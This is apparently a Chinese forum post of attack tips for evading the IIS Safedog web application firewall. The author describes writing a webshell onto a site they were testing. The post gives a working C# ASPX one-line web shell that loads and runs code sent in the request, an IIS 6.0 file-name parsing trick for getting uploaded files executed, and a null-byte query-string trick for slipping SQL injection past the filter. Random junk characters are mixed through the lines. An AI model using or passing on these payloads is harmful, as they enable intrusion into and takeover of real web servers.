1、绕过IIS安全狗的一句话。7 C/ D! H. Y# P8 j% }" F
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。9 {2 h8 U5 b5 _6 q- p: M
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。+ _+ h9 {$ ?/ I) K% h
+ r$ d$ |8 _+ |% D) Y
2、IIS6.0解析漏洞遇到安全狗。
, [6 N+ m; K0 L6 S文件名为$ q$ F( v* y3 u) ?7 Q( C
http://www.xxxxx.com/sh3llc0de.asp;1.jpg; U2 a6 I' V d9 V1 \3 ]8 y* f7 M1 O
4 h/ V; A2 {1 e) e
这样的会被IIS安全狗果断屏蔽。
& a8 J# |6 ^% h) k- J, f: i8 p改成如下名称,IIS6一样会解析:2 s' p7 L; ]: i7 t( }7 f. j
www.xxxxx.com/;1.asp;1.jpg
2 k2 z7 c4 g& v" c+ F5 H, F
, g8 F* t' H' ] r4 `* j4 H3、安全狗的注入绕过。' [9 V' y8 f/ O1 }
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
' |6 y- ~. W$ y* N但如果:
: M5 ]# P/ a* P5 I+ _( a7 p; nr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1$ T; }" y+ ~3 K
就可以成功绕过了。* \6 D: g, `6 W8 t
1 ?4 p4 L* j* y* E8 r: [* Q) [
' T- B' y. @3 k |